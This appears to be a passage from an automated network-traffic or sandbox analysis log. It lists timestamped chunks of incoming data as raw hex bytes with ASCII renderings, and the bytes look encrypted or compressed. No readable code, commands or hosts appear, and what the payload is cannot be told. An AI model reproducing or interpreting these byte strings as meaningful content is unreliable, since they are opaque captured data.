2022-08-23 11:21:50 UTC	12	IN	Data Raw: 02 20 d5 85 3e 52 86 1c 91 31 63 8c 2e 10 33 bd 5f 9a dc 64 29 0b cb 63 c8 85 35 a4 98 b6 be f7 29 af 44 08 0a 35 40 97 25 a4 4d 3a a7 de 22 5e 85 e0 23 ef 3c 66 b6 20 e5 70 f0 f8 43 d9 8a ba 50 5b 42 42 33 06 e0 dc 31 21 32 9f 84 d1 dd 79 0c f8 89 e1 88 ae 6c 0f 52 b0 9e 14 de 38 5b 92 63 be 20 ba a9 78 57 7a 21 b3 84 f1 ab 9c 87 3c ad 4f a2 91 7c b5 58 1f 00 50 d9 6f cb 7e 1f ab b8 11 87 9d 66 b1 ae dc a0 8b 2e 01 c7 e4 fb 77 f2 69 4e b3 e1 55 7d 92 2a 33 9f 56 b7 aa d5 1a 3b 5d 22 e4 bd f2 8f 36 7a 3d 43 df 89 ff e4 75 d9 ad 48 26 3c 78 13 70 58 fe 7d e0 fd da a6 d9 c3 77 a0 9d 49 72 bc c4 c9 10 fd ca bd a5 a1 51 8f 32 ae 09 66 ae 79 8c 2e 11 b3 2d 43 65 33 6c 50 a2 14 38 fc 9e 7d d6 27 9a 45 d2 35 37 d7 09 89 ac 22 e0 ec 3a 46 d2 be e4 ed 12 e3 2a 23 Data Ascii: >R1c.3_d)c5)D5@%M:"^#<f pCP[BB31!2ylR8[c xWz!<O\|XPo~f.wiNU}3V;]"6z=CuH&<xpX}wIrQ2fy.-Ce3lP8}'E57":F#
2022-08-23 11:21:50 UTC	13	IN	Data Raw: b1 28 9b bb 01 27 d4 e7 61 0c 20 32 ee 30 63 2d 28 a9 4b 9a 6c 07 64 69 4d 45 be 63 f4 45 ea 74 a0 d7 ca 48 fc da 45 c9 78 95 34 b3 93 19 88 5d a2 f7 a3 6e c3 96 17 63 0c fd 34 ec d2 f8 f0 a6 04 13 de c1 91 af 59 9a 31 41 e6 60 1a 9f ab 48 7c 84 11 59 51 cd d4 8c 2b c2 7c 40 3f 80 e7 45 a5 6b b8 0d 04 21 12 cc f8 40 ce 45 d6 23 36 1b c8 a6 f0 13 96 c8 1a 46 8b b2 09 88 2c d3 71 d5 2d 28 fe 5a 9a 4e a7 25 7e de ac ae 8f 04 19 45 ed ef d5 a4 c0 98 a9 34 e9 1d 5f 3c 17 cf 69 24 74 9b 27 c7 1c 34 ed 6b 45 9d 07 23 97 a4 6b 25 1c cd 53 20 fe 5e 74 aa 53 43 58 48 cf e4 ff 6b 3d fe b5 d1 2a 66 73 a8 fd 2a 76 9b c5 4d 0b 18 bb 32 bc f0 4a 15 93 07 8b bd 54 a8 e7 43 7d d7 ad 77 7d 77 29 0e 34 e7 da 74 b5 4c 86 b7 77 a9 f1 2d 2a 07 23 fb d1 dd 70 a1 d9 12 ad ce 26 Data Ascii: ('a 20c-(KldiMEcEtHEx4]nc4Y1A`H\|YQ+\|@?Ek!@E#6F,q-(ZN%~E4_<i$t'4kE#k%S ^tSCXHk=fsvM2JTC}w}w)4tLw-*#p&
2022-08-23 11:21:50 UTC	15	IN	Data Raw: f7 5d 2b 78 d2 c0 5d 5b 78 f3 c9 8c 66 5e 1a cc fa d9 55 71 2c e0 8b 6c 5b e8 9c ba 85 4c b8 b5 d4 85 b9 5e ba fe c9 97 e1 72 1b 4d ea 96 88 dd e7 fd 18 ad 64 75 d1 ef 0d 2a a5 25 51 5d 14 ae f4 89 fa 07 aa ff 71 5a 92 b8 32 81 b9 93 84 ef a7 3a e7 dc 11 9a a4 b1 74 27 b9 d5 bf 23 ea d0 93 2e 50 4a 24 8d a3 70 5c df 50 83 84 61 99 78 40 7e 32 8d 33 97 a9 76 df f1 46 57 78 48 9c 2b 71 14 e1 a2 f7 dd f7 ea 91 ad e4 dd 9f 07 21 4b db 12 8d 3d 7d 5d 36 22 21 b0 18 e2 af b8 79 71 90 3b ef ba 0a 95 a6 79 85 bc 7a da 0c 0f b6 d1 cd f9 ee 24 a3 40 ff 96 e2 54 57 e8 c2 a1 42 d3 82 8a db 04 87 d9 3a c2 e2 93 6c 00 05 b5 ac c5 23 b0 95 1f 75 8e 68 ca 86 b5 8b 51 36 3c 7f bf b1 13 c2 86 71 0e 4c ac 0c 52 98 ba 6d c9 bc 90 f3 50 9e 5e b6 c8 cf 7c a5 c9 4b 2e cc 9b 54 Data Ascii: ]+x][xf^Uq,l[L^rMdu*%Q]qZ2:t'#.PJ$p\Pax@~23vFWxH+q!K=}]6"!yq;yz$@TWB:l#uhQ6<qLRmP^\|K.T
2022-08-23 11:21:50 UTC	16	IN	Data Raw: 3c 61 af 3b ff 8e e0 d0 57 d0 6c 93 81 4a 40 3f ba 19 e9 d4 29 46 50 94 7a da ee 6e 18 e7 a1 bb 8c b8 98 04 6c b3 a1 f8 db 38 4c be 30 ae de b1 27 65 70 73 19 f8 66 f0 55 9a 8d 3b a8 57 5c 90 e5 b3 fa 02 29 50 d1 61 cd 93 1a bf 35 6f aa 9d 66 a4 2a f4 5e 8a 06 10 fe 2d f9 7f e2 bf 91 9f e3 48 7c 8b 31 28 8e b9 b2 9b 29 30 12 60 43 30 5c 1e a1 36 6b 2a 68 22 88 a9 e3 7c d1 06 43 3a 3e 6a 1e 59 3b e4 83 e1 d1 d6 97 6a d9 48 be e3 75 76 a0 3e a7 39 f0 cd d8 04 86 51 85 35 9a a6 14 7c 7d 8c 35 39 e0 c8 4f 49 3f 61 a2 b9 2b 38 eb a5 65 cc d9 92 7e 2f 2c 08 d1 11 95 a8 3d 07 13 17 69 c1 86 cf f7 0e e7 3d c5 0d e8 f0 4c 08 21 9a 72 4e ac 4b be 58 65 05 2e 80 99 5c 59 ef 9c 2f 04 a1 5c 2a 86 6a 63 84 52 61 18 50 1a db c4 f7 72 09 0e 7b 43 00 f1 49 7a 0e 9d e4 6d Data Ascii: <a;WlJ@?)FPznl8L0'epsfU;W\)Pa5of^-H\|1()0`C0\6kh"\|C:>jY;jHuv>9Q5\|}59OI?a+8e~/,=i=L!rNKXe.\Y/\*jcRaPr{CIzm
2022-08-23 11:21:50 UTC	17	IN	Data Raw: e2 da fe 63 06 77 52 06 d2 fc 27 6e 17 2b d4 c2 8e df 7b 93 20 ee e6 60 14 c3 c6 4a 7c 83 2a 70 40 c7 b1 e7 22 c2 76 7d 12 3d e4 45 b4 63 c8 90 37 38 66 ed 24 42 ca 6b ae cc 36 1d ea ea 1e 13 9c 42 00 4a 9a ba c0 3f f2 d1 71 d1 2a d7 ca 43 e4 46 b4 34 6b e7 a2 84 d0 00 31 60 4f fe ce 33 e1 62 a8 30 32 3e 4d 2d 03 d9 62 7f df 82 59 c4 34 25 e9 43 56 8c 0b 34 b3 93 43 fb 14 4d 5c 37 73 5d a9 c9 51 50 49 5b c1 86 e4 ad 41 f7 b3 73 3f 5f 7d be e9 04 c6 b8 c5 47 15 b0 52 30 bc f2 80 dd 97 07 8b be 58 cf c5 48 15 f6 72 75 79 59 90 1d 26 f5 e6 43 9d d4 8c 37 74 81 e0 29 f7 2a 33 f7 c7 cc 64 c6 e6 1f fb 1a 24 ca 8c e8 4f a8 0d 9e 31 84 8e 2e 1c dc 75 5f 9a d2 94 78 17 c5 70 ce 9a 53 93 99 36 b6 db 31 83 e5 17 08 33 6e 63 06 a4 47 10 7c f4 22 5e f2 e0 c8 ed 36 6d Data Ascii: cwR'n+{ `J\|p@"v}=Ec78f$Bk6BJ?qCF4k1`O3b02>M-bY4%CV4CM\7s]QPI[As?_}GR0XHruyY&C7t)*3d$O1.u_xpS613ncG\|"^6m
2022-08-23 11:21:50 UTC	19	IN	Data Raw: 76 d0 c0 f1 1e 21 bc cc 78 ed 1f bf f8 96 9b 0c be d7 8b 56 81 b9 24 1d b9 8c 88 10 b2 02 f8 8a bd 9a a4 bf 13 2d a6 d8 b7 29 34 d0 85 39 82 47 19 8e de 70 16 de 51 ec c7 72 9e 72 8d 7b 3b 74 5d 86 a3 75 cf a2 76 54 71 27 b8 38 76 12 e3 a1 c8 c5 f4 c6 94 a4 ff cb 9b 3e 00 55 25 19 8b 0a 74 58 70 b2 30 b0 1a e0 c0 ad c1 71 9a 13 f0 b9 0a 9f 41 56 80 9a 7a de 27 05 cf c0 cd f9 ff 65 b1 40 bf 94 f1 51 4d ed b9 8d 54 d8 ad 15 b4 5b 90 27 3d f1 e9 98 60 00 13 a4 4e 3a 0e 9e 8b 6a 46 89 70 30 8a 84 9a 7d 34 06 9b a3 ac ee 4d 1d 40 fc 6c a9 07 7a d1 90 7d ce c2 a8 db 44 95 31 f6 f1 73 76 ca 1a 54 22 d5 b6 22 99 ba 30 23 d4 cb 62 1b 29 3e ee 33 4b c6 2e b2 b3 96 33 fb 6c 49 43 57 b7 72 d5 5d 84 9c aa ff d4 44 22 dc 6d 38 aa 6d da a6 ef 43 88 4c af 34 bc 96 cb d5 Data Ascii: v!xV$-)49GpQrr{;t]uvTq'8v>U%tXp0qAVz'e@QMT['=`N:jFp0}4M@lz}D1svT""0#b)>3K.3lICWr]D"m8mCL4
2022-08-23 11:21:50 UTC	20	IN	Data Raw: 06 fe 76 0e 5c ae 79 3d 92 54 a3 b9 c1 b4 58 15 05 58 da 7e dd 34 5e 95 38 11 87 c1 66 a0 aa 02 a1 75 fd c9 10 de 06 b1 0b be 6f 75 1e a0 8f 81 39 37 9f 5e bf b7 23 04 1e a6 34 e2 b5 e2 a3 13 6a 39 52 23 f3 9a e3 7c d5 1f 57 3b 2f 76 3f 76 43 ee 8f e1 d9 c1 73 95 f4 61 8f 00 47 7f ac 3a c0 23 fd 33 d3 56 80 53 fe 78 9d 3c 7f be 55 a8 3e 15 a0 d0 6a 6c 37 7a 56 bb 2f 1a fd 8f 73 e9 be 9b 69 d7 0b 3b de 05 98 a0 2e e0 ec 3a 4c c7 d6 a8 ed 03 e3 3f c6 ff e9 d4 5d 15 a1 bc 5e 46 90 91 f6 b0 40 16 29 95 94 54 4b 07 63 02 2d a4 67 2e 9a 6f 7f 72 4e b3 1b 57 38 f2 28 b9 65 df 01 7f 63 15 66 5f 5a 0d b5 d2 5c 21 48 49 16 84 a5 69 f3 f5 c3 82 5c 1c ec fd 58 52 79 35 1f 99 4f 4d df 98 52 f7 9c a2 b9 d5 2f b4 af ac c4 4c c1 e3 1d 68 ef fb 9f 8d c7 6b a4 07 a7 9b d6 Data Ascii: v\y=TXX~4^8fuou97^#4j9R#\|W;/v?vCsaG:#3VSx<U>jl7zV/si;.:L?]^F@)TKc-g.orNW8(ecf_Z\!HIi\XRy5OMR/Lhk
2022-08-23 11:21:50 UTC	21	IN	Data Raw: 24 0e 82 43 ad d3 36 1b c3 d2 2e 10 96 ee 09 4a 9a a1 1d a0 e0 d3 72 fb 0c a4 f9 50 9f 58 62 ae 64 c8 be ae e9 07 19 49 59 64 ce 6d fa 4a 85 34 ef b5 66 d7 02 db 7b 06 c4 b5 27 cd 3e fb ed 6d 65 8f 1b 32 9b b0 43 fb 1e d5 4d 37 61 44 74 aa 53 4b 79 5a de 33 d7 b4 3f bc b3 73 2a 09 46 bc e9 06 c6 fc c5 47 15 44 67 30 bc f7 56 9f bc 6e 8b bc 4d d5 9c 51 6b f5 75 62 12 1a 8b 1f 2c f4 ee 70 ba d4 86 d8 11 81 e0 27 2d 1a 5f 9a c7 ce 71 b7 ca 34 ea 7d 24 ca 82 c7 7b 4d 0f 98 1f c8 fe 2e 16 56 7b 21 9c d6 49 75 7b aa 70 cc 8f 23 cf f5 48 bf d1 3d 8f b9 95 0a 33 69 24 1f a5 47 10 d4 15 20 5e f0 2b 0b df 36 6d a5 25 d2 57 e9 93 2a d7 74 b1 71 42 33 4e 18 06 ea cb 2d 5f 4b f0 fc db c2 7c 0c f9 98 f5 86 66 a2 07 52 b5 80 68 87 38 4a 9c a0 70 d4 b3 a9 7c 74 10 44 f0 Data Ascii: $C6.JrPXbdIYdmJ4f{'>me2CM7aDtSKyZ3?sFGDg0VnMQkub,p'-_q4}${M.V{!Iu{p#H=3i$G ^+6m%WtqB3N-_K\|fRh8Jp\|tD
2022-08-23 11:21:50 UTC	23	IN	Data Raw: a2 de 7d ee f2 63 b2 e1 94 6b f5 86 54 ac 27 c1 eb 4a 5a 7f 6a 17 a3 2b 2b 12 f2 a6 99 3b f5 fb bf a4 ed cc 91 40 05 4a db 12 ac 15 65 5c 77 34 4e 6f 1a e2 a5 b2 c7 59 4e 3b e6 b2 06 9d 77 7d 93 af 6e f1 17 1e b0 c0 c8 63 f0 1d cf 9f bf 96 e8 52 71 ee cb df 14 d8 a9 9b ca 06 87 f1 28 eb f1 8e 76 06 8c 14 60 19 d1 bd a7 3c 58 89 70 3e 94 9d a1 54 34 17 96 62 a7 3a 4c 31 58 e4 4c ac 06 7a d1 b8 27 85 c2 ad ee 50 94 30 e7 f8 ca 76 bd 1a 4b 2e 81 b1 22 99 c3 3e dd d5 e3 4b 70 5b 3c fd 34 4f a9 3d a9 4d 93 09 cb 54 69 47 5c a1 5c a1 65 c9 9d a0 dd d6 6d 6e d7 54 ca 5e 80 25 9a fc 45 88 5d 80 9e b2 68 cc d1 7d 63 0c f1 73 31 d2 f8 f0 9d fd 29 d4 c6 b9 e4 48 8a 54 ec f4 61 38 a6 d1 48 76 89 10 51 68 89 ba 67 21 ea 9c 7b cf 86 cf 0b b4 61 dd ff 6e 09 ae e4 24 44 Data Ascii: }ckT'JZj++;@Je\w4NoYN;w}ncRq(v`<Xp>T4b:L1XLz'P0vK.">Kp[<4O=MTiG\\emnT^%E]h}cs1)HTa8HvQhg!{an$D
2022-08-23 11:21:50 UTC	24	IN	Data Raw: a2 b3 35 e5 16 74 3e c7 a1 9c c6 36 6b 3d 47 28 9b d7 e3 6d d5 2c bd 3b 03 79 0a 6b 40 f7 87 e1 c0 db 90 6a d9 48 a8 95 5b 60 88 b7 c8 3c f7 c0 cc 69 a5 51 94 35 8a c2 7a 91 7e 94 2c 11 aa c2 46 55 c8 7b 70 b4 05 25 fa fc 45 c0 d9 91 65 cc 3e 20 d3 18 9c b1 ca 1f c1 13 52 cf b7 f3 e9 03 f6 30 c7 0d e8 f0 47 35 82 a6 61 4a a8 d4 0d 57 41 08 09 9e 97 4b 63 5b 7b 3d 2c a3 5a 23 90 9d 7e 56 50 5a 09 7f 18 e1 57 ef 6c 21 04 50 49 1a 62 67 39 f1 62 08 54 0b 42 4a 3e b1 94 6b f9 96 a4 82 5c 57 ca e3 45 50 1e 77 e0 98 69 67 e8 89 ba 26 68 90 4f d4 27 ae 22 f1 e9 45 cc 9b 01 9f ef fb 9f 9b cc 69 d1 56 ad 65 d3 c7 e3 64 6c b1 32 7d c6 10 d3 ad af eb 09 b9 b8 31 58 92 b8 08 0e b9 b9 80 c3 b5 29 9c 66 89 9a a2 c8 5d 2a b9 df de 2e 27 f1 84 24 4a 46 35 87 99 49 5c ce Data Ascii: 5t>6k=G(m,;yk@jH[`<iQ5z~,FU{p%Ee> R0G5aJWAKc[{=,Z#~VPZWl!PIbg9bTBJ>k\WEPwig&hO'"EiVedl2}1X)f]*.'$JF5I\
2022-08-23 11:21:50 UTC	25	IN	Data Raw: e5 26 82 f3 c6 9b 34 fd 31 25 e8 69 4f 8e 58 32 9b a1 41 80 4e cd 55 33 5e 52 5c 5b 50 50 4f 2a 82 f3 d7 be 45 8d eb 72 3b 7d 6b aa e3 3a 3b 9a c5 47 1d 4b 0b 30 bc f2 5b b0 ff 06 8b b6 54 aa e7 41 05 df 22 3e 7c 73 e1 5f e1 f2 ce 60 9f af d6 b7 7d 85 e6 33 fc 25 5c f6 c7 c4 5b b0 dd 06 85 4c 32 34 89 d6 ad ab 1e 9f 1b dc de 2e 16 58 7a 40 90 00 61 1d 15 c5 7a df 88 26 db d0 48 bf df 37 98 c1 dc 22 58 69 4b 2f b7 49 18 87 ad 22 5e f2 3b 3c ff e0 45 c4 32 e1 7a f2 f9 5e ac 24 bb 7c 4f 46 26 0c d0 c8 b3 28 4e 45 f1 97 df c0 0d 4f fc 89 f4 8a a7 8a d8 56 d8 88 07 d0 56 59 9c 7e d5 8e bb 85 7e 7a 60 05 26 52 62 55 b6 8d 2f b7 7d db c1 e5 b5 5c 19 3a 4e 0f 56 b1 6c 1b 99 2b 19 85 e6 36 a0 aa c0 58 95 22 d9 c7 4d f8 77 fe 4c 92 c8 b1 5f 70 8f 3f 28 b5 91 9b dc Data Ascii: &41%iOX2ANU3^R\[PPO*Er;}k:;GK0[TA">\|s_`}3%\[L24.Xz@az&H7"XiK/I"^;<E2z^$\|OF&(NEOVVY~~z`&RbU/}\:NVl+6X"MwL_p?(
2022-08-23 11:21:50 UTC	27	IN	Data Raw: 87 34 c0 71 96 6a 38 93 22 b8 64 7b 8f aa 60 f2 22 0f b6 db 13 e6 f4 3c 9b 40 bf 9c ce 52 56 c0 83 b0 54 d2 a1 b9 e0 03 90 2d 17 e8 e8 a3 26 00 02 a9 8e d3 25 b5 a8 14 75 88 58 34 87 9b 89 40 34 46 17 bc a9 10 4c 31 59 f4 4c 81 06 d0 06 b8 63 d2 c2 a2 f2 52 94 1c fc 70 2a 76 d7 1a 4b 2e c6 a2 12 8c bd ef dd d5 e7 3f 1f 25 35 eb 27 4f ef 83 a9 4d 97 1f f2 60 7e b9 57 9b 71 e5 5e 81 9c b1 d3 db bb 23 fa 5f c6 42 ba 49 bb fc 4e 84 41 bb 2f b2 79 ce e3 00 62 20 e5 59 7d 9c f8 fa b1 12 3d cc af ac ae 48 80 78 fc f5 64 10 fa d4 51 82 84 2e 45 42 bc f5 67 2b c6 75 66 d5 57 89 c0 a2 0e a5 e0 04 2b 3e fe 37 46 ce 52 bd d2 c8 1a ee db 1c 68 d8 c2 09 4e 9c a8 05 cf cc d0 71 d9 13 b8 ea 5e 9a 5e b0 29 91 ce 96 8d d6 10 31 2f 4e fe ce b8 f6 71 ac 34 fe bb 56 d3 02 f7 Data Ascii: 4qj8"d{`"<@RVT-&%uX4@4FL1YLcRp*vK.?%5'OM`~Wq^#_BINA/yb Y}=HxdQ.EBg+ufW+>7FRhNq^^)1/Nq4V
2022-08-23 11:21:50 UTC	28	IN	Data Raw: f1 31 9d 36 64 a6 6e 8a 3f 04 ac cc 4c b7 37 56 44 ba 7c 72 fc 8f 7d d0 dd b3 15 d0 2d 2e c5 11 f7 dc 34 1e e7 09 4a d6 ab e0 fc 05 f8 24 23 f2 c5 fe 40 65 11 bd 72 4a aa c6 72 2e bf 09 21 f6 0b 5c 50 ff 4a 55 29 a3 41 31 9c 0c 0b 7a 53 47 05 6a 0b f6 53 e1 63 c5 fb 7d 67 39 5f cb 51 0e 9d ec 4e 27 42 5b 38 bd b9 97 f8 f1 b0 80 27 54 ca e3 50 5b 67 25 6f 2f 0c 3e e7 8a a7 17 7d ab b3 d5 36 ae 4e a7 16 44 ea ee 71 61 8a fb 99 94 f2 ad ac 18 ad 7a dc d3 e6 19 2f b7 2f 87 c0 38 be f6 ac 90 69 be d7 90 37 c0 be 24 06 b4 8d 97 e8 b3 3f f5 ef 77 9b 88 b2 7e 7e b9 d5 a0 22 28 d2 84 24 6d 40 2a 8e 29 48 70 97 53 97 97 61 99 76 82 f1 0c 8a 5c ab ba 73 c8 e7 58 4a 21 bb b0 2e 66 0d b9 3a ce 3e ed fd 0b ad e9 d5 83 b3 16 4e c1 07 b0 a1 6c 58 6c 21 2a 2c 0b e7 b3 a7 Data Ascii: 16dn?L7VD\|r}-.4J$#@erJr.!\PJU)A1zSGjSc}g9_QN'B[8'TP[g%o/>}6NDqaz//8i7$?w~~"($m@)HpSav\sXJ!.f:>NlXl!,
2022-08-23 11:21:50 UTC	29	IN	Data Raw: 5b ac b5 ef 7d 67 94 07 8b 20 4e a0 d6 ae 6b ff 72 e9 74 6a ab e0 26 f3 ce fc 94 c8 a6 48 7d 81 e0 b1 23 10 10 08 c7 ce 7b 2c dc 18 a5 ec 24 ca 88 5c 5a b5 04 b8 e6 a7 8e 2e 8a 55 63 55 ba 29 49 71 14 59 79 d3 8e 04 5f 80 48 bf 47 38 91 d2 06 65 47 68 4b 2f bb 5e 09 f8 fd 33 5a e9 36 dd ee 1a 44 ad 48 af 70 e1 f8 5e ac 38 bb 7c 4f 2f 50 19 06 ea b2 2b 35 1e 9f 84 df 14 5e 62 fd 89 fa 9a a6 fd 7a 7e b3 83 18 d6 2b 4e 96 6d aa c1 b6 7b 7b 50 68 1b 8b 34 0e 54 b2 83 14 c3 7e a0 9b f3 ab 37 6b 25 50 d3 61 d3 7e 1f 93 29 15 9b 63 67 8c bd c6 25 c4 02 0f eb 3e d4 5f 88 40 90 b9 f7 47 1f ff 39 37 95 5a a0 b3 2b 0a 13 47 21 30 a2 cd 82 0e f3 c4 a7 de 97 c6 f0 78 d1 26 47 2c d1 7d 3f 62 4b f7 87 e1 c0 db 92 8f 26 65 88 9f 73 73 98 09 34 c3 0e e7 d2 7a b2 61 80 31 Data Ascii: [}g Nkrtj&H}#{,$\Z.UcU)IqYy_HG8eGhK/^3Z6DHp^8\|O/P+5^bz~+Nm{{Ph4T~7k%Pa~)cg%>_@G97Z+G!0x&G,}?bK&ess4za1
2022-08-23 11:21:50 UTC	31	IN	Data Raw: 0a ad 8e 07 7d 89 61 3c 9e 67 88 56 39 14 83 a9 c3 0f 43 6e dd e7 48 b6 15 72 d1 a9 65 d0 ce 5c f2 7c 9d 09 73 c8 cf 76 d5 17 58 26 c6 a0 2a 97 b4 d7 dc f9 ef 61 09 0b e5 e2 3e 58 df 29 b8 45 8f e1 e2 48 79 44 49 ae 16 dd f1 82 9c a0 00 44 56 25 cf 47 c8 54 83 2d a5 f1 ba 89 71 bc 39 b7 79 cd e8 fa 65 04 fe 4a 00 fa 7f fb b5 1e 34 da d3 99 af 59 82 43 19 e7 4c 1c e8 cf 57 23 9d db d7 53 c1 a5 74 23 c2 67 71 d0 8a 19 44 98 6c c6 e6 24 1a 10 e4 24 70 08 5c b2 dd 3e 1b d3 c1 08 ed 97 ee 0a 5d 89 b6 1d b1 f9 ce 7f 2d 34 89 fb 71 9f 77 57 ca 90 30 ab 83 fa 15 29 40 4f 43 c5 b3 e8 3d a8 34 fe a9 42 15 ac da 7d 0c ec 93 38 c0 ca 24 c1 79 50 96 23 4e 9a b0 49 fd 01 e3 3a c5 73 59 7e b5 5c 5c 49 51 c0 0c d6 98 29 fd c8 2f 3b 77 63 94 94 03 ee 91 c3 58 0b 5f a9 30 Data Ascii: }a<gV9CnHre\\|svX&*a>X)EHyDIDV%GT-q9yeJ4YCLW#St#gqDl$$p\>]-4qwW0)@OC=4B}8$yP#NI:sY~\\IQ)/;wcX_0
2022-08-23 11:21:50 UTC	32	IN	Data Raw: 48 bf 09 00 a8 c5 0d 4c c4 54 25 99 90 43 5e 93 b4 41 56 a2 4b 2d 9a 68 7f 7d 4c 44 e4 7a 34 ff 51 8b 2b df 05 78 4d 5e 19 5e 50 04 82 fd 56 21 45 50 c0 a3 88 73 fb a6 ea 82 5c 1e c9 98 0d 52 71 28 c9 e4 62 4a ed 9c b5 67 17 b8 b5 df 3c a3 51 aa f6 bb c7 cd 53 18 94 b5 99 90 cf 69 af 63 f6 65 d7 c4 8f 85 3e b1 34 51 ba 15 ae f4 b9 f1 62 ca d7 94 52 8d b7 2f 0c b9 8a 7a ef 9f 38 f1 8f c7 9a a4 bf 03 50 e4 d5 a4 2a 2a ab 54 4b 02 47 35 8d cd 42 5c d8 4c 12 d8 4d b9 70 e7 32 23 8a 58 a8 aa 0d 85 e2 4e 51 1e bb a1 2b 77 3a 89 a7 df 31 e3 f0 f8 c8 ec cc 91 31 0c 4b dc 04 59 3c 51 47 75 45 6f b0 1a e6 ac c3 a0 71 90 3f ce c3 0b 95 6e 6d 9f d3 1f da 0c 05 ab da cd fe eb ea a1 6c bd 81 e9 54 58 f7 c8 4e 55 f4 ab ba de 3b 77 d9 c4 11 ca 8b 67 00 11 93 56 c4 82 b2 Data Ascii: HLT%C^AVK-h}LDz4Q+xM^^PV!EPs\Rq(bJg<QSice>4QbR/z8P**TKG5B\LMp2#XNQ+w:11KY<QGuEoq?nmlTXNU;wgV
2022-08-23 11:21:50 UTC	33	IN	Data Raw: 65 b1 4f f3 32 8a 57 32 fd ee 09 1d 52 50 4d 5b dc 89 60 b4 3f fa 9b e7 3a 77 6d c1 5f 02 ee 9f c0 51 1d 4b ed 30 bc f2 5f e3 23 07 8b b8 6f 2f f7 51 61 fd 77 fb ca 0c 32 1f 26 f7 cc 62 e6 6d 86 b7 79 a9 74 2c 2a 07 4d 4f c7 ce 7f 9a d5 06 96 23 26 ca c8 c1 53 aa 68 98 19 b6 98 3d 12 64 4e 5e 9a d6 49 60 10 d8 8e cd a9 2a a2 fb fe bf db 35 af 5b 0b 0a 39 76 58 21 a4 56 1e e4 03 23 72 e2 3f 58 5d 36 6d ab 4d f0 71 e1 f6 74 cd 75 bb 76 41 59 2a 1c 06 f1 dc 36 43 b1 9e a8 d4 c0 0d a7 fc 89 f4 a4 2e 93 0e 74 ac 87 14 de 38 5b 92 60 50 df 97 8c 7d 45 d0 19 f0 7a 13 47 b2 87 2d ba 68 5e 90 c9 b6 40 0c 21 50 c8 7a c2 64 e5 92 14 16 8f b1 06 bf a0 d7 5a 8a 13 0b f6 df f8 5b f2 47 bc b8 fb 4c 74 8b 28 33 84 b9 b2 9b 3f 19 6c ee 35 ce a7 9f 9a 37 6b 33 70 3b 89 d3 Data Ascii: eO2W2RPM[`?:wm_QK0_#o/Qaw2&bmyt,MO#&Sh=dN^I`5[9vX!V#r?X]6mMqtuvAY*6C.t8[`P}EzG-h^@!PzdZ[GLt(3?l57k3p;
2022-08-23 11:21:50 UTC	34	IN	Data Raw: dd 0f b6 d7 d4 ca dd 1a a4 43 d0 4f e2 54 59 fb c6 a1 50 f5 ae 8b d1 de 6a 27 3b ee f1 8f 08 15 02 a3 58 3a 04 b3 82 16 62 8a 58 e5 87 99 8f 79 30 3f 4a bc a7 16 23 e9 59 f4 46 8a 04 72 be 62 6d cf c8 af fa 4e bb 3a dc cd cf 76 4a 10 96 ed c6 b1 22 80 ab b8 c6 fb ec 47 1a 25 24 7d 3e 96 65 29 a9 4d 9f 08 72 7a 58 4c 76 b2 72 fd cd 8f 41 01 d7 c0 45 2a c1 c5 d6 7a 9b 2d ad 6d 4e 55 cf a8 2b b2 60 d2 68 e8 4d 07 d7 5e 06 d2 78 f0 68 95 2b d4 c0 99 b6 d9 9d 70 f3 ee 79 81 f2 fe 46 74 9c 93 49 6e cf 9b 62 2b c2 f6 73 11 e7 ef 5c 25 6a d0 f6 37 2c 11 fb 2e 6c e3 63 bc ce 36 9b c8 17 4c 14 8c f1 04 43 85 a8 33 bc d1 d4 71 d3 b5 af 27 1b 92 55 25 27 6a c6 a7 97 d5 d0 37 4b 6f fb c4 b3 68 68 76 19 f9 b5 90 04 26 f3 50 0c ec 91 34 cb 25 23 c5 a5 4f 8e 0d 38 b3 9e Data Ascii: COTYPj';X:bXy0?J#YFrbmN:vJ"G%$}>e)MrzXLvrAE*z-mNU+`hM^xh+pyFtInb+s\%j7,.lc6LC3q'U%'j7Kohhv&P4%#O8
2022-08-23 11:21:50 UTC	36	IN	Data Raw: 5c a9 11 37 d7 94 79 c6 ce 65 68 fd 2f 3c d8 09 9f be ca 1f c1 14 52 ce ad e7 f5 fd e6 18 df d8 eb f7 a1 1c 24 75 72 4e ac ef 2b 4d bc 74 ed 99 94 58 7a f9 62 2e 3b 93 4e 27 9c 63 7f 7a 21 4d 1a 6a 1a e7 de de 65 df 07 76 4d 27 64 5b 23 e3 9d f7 5b 83 44 4f 16 46 a4 69 ff f7 a4 82 4f 2a cd e3 4a 52 71 2c 93 98 63 5b e5 9d 20 26 63 b8 b7 df 21 be 52 a9 ed 4b c2 92 9c 1a ef fd 3b 96 c5 6e 84 fc ad 65 d1 ea e0 19 2d 81 31 79 7f 14 ae fe af eb 0d be d5 bc 4f 92 be 2e 0e a8 ee 48 ee b3 2a f1 e2 f4 57 a4 bb 04 29 ba a8 6f 2e 34 c5 80 20 13 99 35 87 d1 4b 2f 2b 51 ec df 0e 78 72 9c 7a 21 a2 b7 aa a9 70 a4 28 4e 55 75 25 da e1 71 12 f6 d8 7b 3a f5 e0 95 d3 32 cc 9b 29 74 96 db 18 ad 52 d8 5c 77 34 23 df c4 e2 af be d6 42 8b 39 e4 c3 c0 95 64 7f ea 1a 6a da 06 7b Data Ascii: \7yeh/<R$urN+MtXzb.;N'cz!MjevM'd[#[DOFiOJRq,c[ &c!RK;ne-1yO.HW)o.4 5K/+Qxrz!p(NUu%q{:2)tR\w4#B9dj{
2022-08-23 11:21:50 UTC	37	IN	Data Raw: 75 74 7d 7b 9d 2e 3b f5 df 66 8a 59 dc b7 7d 80 f3 3a 3b 1a 26 e8 ca 53 6a a7 ba a9 84 13 2e a5 d3 c0 53 a0 1c 8c 0e 71 9d 3a 07 48 6d 4a 14 61 7b de 12 d3 1f 7c 84 24 aa 97 c5 e5 db 31 86 de 1d 1b 24 7e 54 05 39 56 0d 93 c5 23 5e fc 2e 27 fe 32 e3 18 2a cf 63 e3 dc 5c d7 74 3b 54 be 42 39 1e 2e 0a d8 29 48 69 89 ae ca c6 60 85 f1 8c e1 88 a0 08 61 cf b2 89 0d f2 1a 48 96 7a 86 fd bb 85 70 2d 71 1d f9 52 f7 56 b6 81 27 d1 cd a1 91 ef e7 4c 13 2b 54 9f 47 50 6d 1b 93 3e 7e 34 9c 66 aa b9 dc 75 e8 10 17 c7 95 f8 77 fe 52 98 a2 e9 40 4a e4 b5 36 9f 4d a0 b0 3a 1c 02 6b 23 cc 83 e1 8b 36 eb 3c 08 09 62 d3 e3 7a f7 21 50 3f f2 b6 11 61 5c f5 8b f7 c0 d8 e2 9c d9 64 ae f2 e9 77 a0 30 db 35 